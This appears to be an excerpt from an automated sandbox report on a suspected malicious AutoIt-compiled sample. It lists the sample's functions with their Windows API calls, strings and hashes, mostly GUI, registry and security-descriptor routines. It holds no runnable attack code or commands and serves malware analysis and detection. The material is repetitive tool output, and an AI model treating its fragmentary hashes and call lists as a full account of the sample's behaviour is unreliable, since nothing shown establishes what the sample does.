                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                • String ID: $AutoIt v3$DISPLAY$static
                                • API String ID: 2211948467-2373415609
                                • Opcode ID: bdbce7ab3199b405c73918352b6fda58f087aff008c3610c3d916937fcd7f5a4
                                • Instruction ID: 93cb1c733b231ba24f17ad85398abc25f9440797df77b5f07980b71f74e5f624
                                • Opcode Fuzzy Hash: bdbce7ab3199b405c73918352b6fda58f087aff008c3610c3d916937fcd7f5a4
                                • Instruction Fuzzy Hash: C4028D71900205EFDB14DFA4DC89EAE7BB9FF58311F008559F925AB2A1D770AD42CBA0
                                Function 001E70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                Download Yara Rule
                                APIs
                                • SetTextColor.GDI32(?,00000000), ref: 001E712F
                                • GetSysColorBrush.USER32(0000000F), ref: 001E7160
                                • GetSysColor.USER32(0000000F), ref: 001E716C
                                • SetBkColor.GDI32(?,000000FF), ref: 001E7186
                                • SelectObject.GDI32(?,?), ref: 001E7195
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 001E71C0
                                • GetSysColor.USER32(00000010), ref: 001E71C8
                                • CreateSolidBrush.GDI32(00000000), ref: 001E71CF
                                • FrameRect.USER32(?,?,00000000), ref: 001E71DE
                                • DeleteObject.GDI32(00000000), ref: 001E71E5
                                • InflateRect.USER32(?,000000FE,000000FE), ref: 001E7230
                                • FillRect.USER32(?,?,?), ref: 001E7262
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E7284
                                  • Part of subcall function 001E73E8: GetSysColor.USER32(00000012), ref: 001E7421
                                  • Part of subcall function 001E73E8: SetTextColor.GDI32(?,?), ref: 001E7425
                                  • Part of subcall function 001E73E8: GetSysColorBrush.USER32(0000000F), ref: 001E743B
                                  • Part of subcall function 001E73E8: GetSysColor.USER32(0000000F), ref: 001E7446
                                  • Part of subcall function 001E73E8: GetSysColor.USER32(00000011), ref: 001E7463
                                  • Part of subcall function 001E73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001E7471
                                  • Part of subcall function 001E73E8: SelectObject.GDI32(?,00000000), ref: 001E7482
                                  • Part of subcall function 001E73E8: SetBkColor.GDI32(?,00000000), ref: 001E748B
                                  • Part of subcall function 001E73E8: SelectObject.GDI32(?,?), ref: 001E7498
                                  • Part of subcall function 001E73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001E74B7
                                  • Part of subcall function 001E73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001E74CE
                                  • Part of subcall function 001E73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001E74DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                • String ID:
                                • API String ID: 4124339563-0
                                • Opcode ID: cb0534d2f7f55efdf8aed4d340344ad3a92f72056363e7a5c901dfba8f081655
                                • Instruction ID: a9449cc8ad0ee7238bf51cf2e7250b22b577f3f6b3cbcb47a3b0ae037e9a534a
                                • Opcode Fuzzy Hash: cb0534d2f7f55efdf8aed4d340344ad3a92f72056363e7a5c901dfba8f081655
                                • Instruction Fuzzy Hash: 15A1B472108741EFD7049FA0DC88E5F7BA9FF49720F100A19FA629A1E1D731D985CB91
                                Function 00168D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(?,?), ref: 00168E14
                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 001A6AC5
                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001A6AFE
                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001A6F43
                                  • Part of subcall function 00168F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00168BE8,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 00168FC5
                                • SendMessageW.USER32(?,00001053), ref: 001A6F7F
                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001A6F96
                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 001A6FAC
                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 001A6FB7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                • String ID: 0
                                • API String ID: 2760611726-4108050209
                                • Opcode ID: b01689f40c329f0fde5526cc91832acd6e4d17ac4e1a7ce6dad196f4613f04a0
                                • Instruction ID: 473aac98cc1af3dea423040815ac39ec440190bfae81421ca191733310bfa069
                                • Opcode Fuzzy Hash: b01689f40c329f0fde5526cc91832acd6e4d17ac4e1a7ce6dad196f4613f04a0
                                • Instruction Fuzzy Hash: 7912B038200251EFD725CF54DC98BAAB7E1FB5A310F184569F4858B661CB32ECA2CB91
                                Function 001D2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(00000000), ref: 001D273E
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001D286A
                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001D28A9
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001D28B9
                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001D2900
                                • GetClientRect.USER32(00000000,?), ref: 001D290C
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001D2955
                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001D2964
                                • GetStockObject.GDI32(00000011), ref: 001D2974
                                • SelectObject.GDI32(00000000,00000000), ref: 001D2978
                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001D2988
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D2991
                                • DeleteDC.GDI32(00000000), ref: 001D299A
                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001D29C6
                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 001D29DD
                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001D2A1D
                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001D2A31
                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 001D2A42
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001D2A77
                                • GetStockObject.GDI32(00000011), ref: 001D2A82
                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001D2A8D
                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001D2A97
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                • API String ID: 2910397461-517079104
                                • Opcode ID: 1b2810f6353bd85250225cfc6bf5ee3f62afb3181a3601218adaa97e1021ab11
                                • Instruction ID: 17cb5870b8562eb448c83c801850bed6b8b7020c03c95e6f60ef50bff37256ef
                                • Opcode Fuzzy Hash: 1b2810f6353bd85250225cfc6bf5ee3f62afb3181a3601218adaa97e1021ab11
                                • Instruction Fuzzy Hash: 39B14D71A00215BFEB24DFA8DC89FAE7BA9EF18711F004155F925EB290D774AD41CB90
                                Function 001C4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C4AED
                                • GetDriveTypeW.KERNEL32(?,001ECB68,?,\\.\,001ECC08), ref: 001C4BCA
                                • SetErrorMode.KERNEL32(00000000,001ECB68,?,\\.\,001ECC08), ref: 001C4D36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorMode$DriveType
                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                • API String ID: 2907320926-4222207086
                                • Opcode ID: d1388a4475e5106d23d2298e0cfcc00b0c00d580c18bd442a55fe4a5ae05a316
                                • Instruction ID: bab4435372af537b66c9769d7ea0faaf7a15a1a38088cd0e74721ec1406a7f3f
                                • Opcode Fuzzy Hash: d1388a4475e5106d23d2298e0cfcc00b0c00d580c18bd442a55fe4a5ae05a316
                                • Instruction Fuzzy Hash: 0861E430619105DBCB18DF64DAA6FBD77F0AB35300B25401DF806AB6A1DB31ED91DB85
                                Function 001E73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetSysColor.USER32(00000012), ref: 001E7421
                                • SetTextColor.GDI32(?,?), ref: 001E7425
                                • GetSysColorBrush.USER32(0000000F), ref: 001E743B
                                • GetSysColor.USER32(0000000F), ref: 001E7446
                                • CreateSolidBrush.GDI32(?), ref: 001E744B
                                • GetSysColor.USER32(00000011), ref: 001E7463
                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001E7471
                                • SelectObject.GDI32(?,00000000), ref: 001E7482
                                • SetBkColor.GDI32(?,00000000), ref: 001E748B
                                • SelectObject.GDI32(?,?), ref: 001E7498
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 001E74B7
                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001E74CE
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E74DB
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001E752A
                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001E7554
                                • InflateRect.USER32(?,000000FD,000000FD), ref: 001E7572
                                • DrawFocusRect.USER32(?,?), ref: 001E757D
                                • GetSysColor.USER32(00000011), ref: 001E758E
                                • SetTextColor.GDI32(?,00000000), ref: 001E7596
                                • DrawTextW.USER32(?,001E70F5,000000FF,?,00000000), ref: 001E75A8
                                • SelectObject.GDI32(?,?), ref: 001E75BF
                                • DeleteObject.GDI32(?), ref: 001E75CA
                                • SelectObject.GDI32(?,?), ref: 001E75D0
                                • DeleteObject.GDI32(?), ref: 001E75D5
                                • SetTextColor.GDI32(?,?), ref: 001E75DB
                                • SetBkColor.GDI32(?,?), ref: 001E75E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                • String ID:
                                • API String ID: 1996641542-0
                                • Opcode ID: 2240d6def131cc0b1d234fec31fd910dd30ab7d6fbb3486018607fa498624344
                                • Instruction ID: 9e9bfa0b927b88eb5b451ceeb98e7c533c50149b534e23c2c99257dc8bcdc63f
                                • Opcode Fuzzy Hash: 2240d6def131cc0b1d234fec31fd910dd30ab7d6fbb3486018607fa498624344
                                • Instruction Fuzzy Hash: 3B616B72900658AFEB059FA4DC89EEEBFB9EF08720F114115F911AB2E1D7709981DF90
                                Function 001E0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetCursorPos.USER32(?), ref: 001E1128
                                • GetDesktopWindow.USER32 ref: 001E113D
                                • GetWindowRect.USER32(00000000), ref: 001E1144
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E1199
                                • DestroyWindow.USER32(?), ref: 001E11B9
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001E11ED
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001E120B
                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001E121D
                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 001E1232
                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001E1245
                                • IsWindowVisible.USER32(00000000), ref: 001E12A1
                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001E12BC
                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001E12D0
                                • GetWindowRect.USER32(00000000,?), ref: 001E12E8
                                • MonitorFromPoint.USER32(?,?,00000002), ref: 001E130E
                                • GetMonitorInfoW.USER32(00000000,?), ref: 001E1328
                                • CopyRect.USER32(?,?), ref: 001E133F
                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 001E13AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                • String ID: ($0$tooltips_class32
                                • API String ID: 698492251-4156429822
                                • Opcode ID: f399afb9ab7c2b6a135886147c178710555e6e8ac1ec5143bf23919f1a0ab41a
                                • Instruction ID: db30d930097fb3911154dec201ef2e76b74d6876501bfdd7ead7364d144a3d93
                                • Opcode Fuzzy Hash: f399afb9ab7c2b6a135886147c178710555e6e8ac1ec5143bf23919f1a0ab41a
                                • Instruction Fuzzy Hash: E1B17971608781AFDB14DF65C884B6FBBE5FF88350F008918F9999B2A1D731E845CB92
                                Function 001E0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 001E02E5
                                • _wcslen.LIBCMT ref: 001E031F
                                • _wcslen.LIBCMT ref: 001E0389
                                • _wcslen.LIBCMT ref: 001E03F1
                                • _wcslen.LIBCMT ref: 001E0475
                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001E04C5
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001E0504
                                  • Part of subcall function 0016F9F2: _wcslen.LIBCMT ref: 0016F9FD
                                  • Part of subcall function 001B223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001B2258
                                  • Part of subcall function 001B223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001B228A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                • API String ID: 1103490817-719923060
                                • Opcode ID: 422e5891c70774033487f9dd62a0abb47b3f090d928964e18ced979dd056f0ba
                                • Instruction ID: bd43e588c803105df65aca8b15ac5f86d4787dc306c01acb77e9eb34a7afb77f
                                • Opcode Fuzzy Hash: 422e5891c70774033487f9dd62a0abb47b3f090d928964e18ced979dd056f0ba
                                • Instruction Fuzzy Hash: B5E1C1312186818FC719DF29C99096EB3E1BFEC314B14495DF8969B3A1DB70ED85CB81
                                Function 00168891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00168968
                                • GetSystemMetrics.USER32(00000007), ref: 00168970
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0016899B
                                • GetSystemMetrics.USER32(00000008), ref: 001689A3
                                • GetSystemMetrics.USER32(00000004), ref: 001689C8
                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001689E5
                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001689F5
                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00168A28
                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00168A3C
                                • GetClientRect.USER32(00000000,000000FF), ref: 00168A5A
                                • GetStockObject.GDI32(00000011), ref: 00168A76
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00168A81
                                  • Part of subcall function 0016912D: GetCursorPos.USER32(?), ref: 00169141
                                  • Part of subcall function 0016912D: ScreenToClient.USER32(00000000,?), ref: 0016915E
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000001), ref: 00169183
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000002), ref: 0016919D
                                • SetTimer.USER32(00000000,00000000,00000028,001690FC), ref: 00168AA8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                • String ID: AutoIt v3 GUI
                                • API String ID: 1458621304-248962490
                                • Opcode ID: cf36ffa0cef7154d1e305887dc6dba8bae60cfee0443ac186c5fc64bd3646938
                                • Instruction ID: a2672b45cb9fbf618d7c18b9ba919e0908ddd171aa6545aeabe2858f37659a8d
                                • Opcode Fuzzy Hash: cf36ffa0cef7154d1e305887dc6dba8bae60cfee0443ac186c5fc64bd3646938
                                • Instruction Fuzzy Hash: 46B19D75A00209AFDB14DFA8DC89FAE7BB5FB48314F154219FA15AB290DB30A851CF51
                                Function 001B0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001B1114
                                  • Part of subcall function 001B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1120
                                  • Part of subcall function 001B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B112F
                                  • Part of subcall function 001B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1136
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001B114D
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001B0DF5
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001B0E29
                                • GetLengthSid.ADVAPI32(?), ref: 001B0E40
                                • GetAce.ADVAPI32(?,00000000,?), ref: 001B0E7A
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001B0E96
                                • GetLengthSid.ADVAPI32(?), ref: 001B0EAD
                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001B0EB5
                                • HeapAlloc.KERNEL32(00000000), ref: 001B0EBC
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001B0EDD
                                • CopySid.ADVAPI32(00000000), ref: 001B0EE4
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001B0F13
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001B0F35
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001B0F47
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0F6E
                                • HeapFree.KERNEL32(00000000), ref: 001B0F75
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0F7E
                                • HeapFree.KERNEL32(00000000), ref: 001B0F85
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0F8E
                                • HeapFree.KERNEL32(00000000), ref: 001B0F95
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 001B0FA1
                                • HeapFree.KERNEL32(00000000), ref: 001B0FA8
                                  • Part of subcall function 001B1193: GetProcessHeap.KERNEL32(00000008,001B0BB1,?,00000000,?,001B0BB1,?), ref: 001B11A1
                                  • Part of subcall function 001B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001B0BB1,?), ref: 001B11A8
                                  • Part of subcall function 001B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001B0BB1,?), ref: 001B11B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                • String ID:
                                • API String ID: 4175595110-0
                                • Opcode ID: 365165600e43cbaca138e706d2db661535369f410b0f9a8ca5d5c62b782e2fcf
                                • Instruction ID: e4dca2856a8dd8ec66b152bc9d0124a020c05f6b5a6599d5e7ad154cd698a19e
                                • Opcode Fuzzy Hash: 365165600e43cbaca138e706d2db661535369f410b0f9a8ca5d5c62b782e2fcf
                                • Instruction Fuzzy Hash: 13713E71A0020AEBDF219FA4DC45FEFBBB8BF09310F148159F919EA191D7719A45CBA0
                                Function 001DC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DC4BD
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,001ECC08,00000000,?,00000000,?,?), ref: 001DC544
                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001DC5A4
                                • _wcslen.LIBCMT ref: 001DC5F4
                                • _wcslen.LIBCMT ref: 001DC66F
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001DC6B2
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001DC7C1
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001DC84D
                                • RegCloseKey.ADVAPI32(?), ref: 001DC881
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DC88E
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001DC960
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
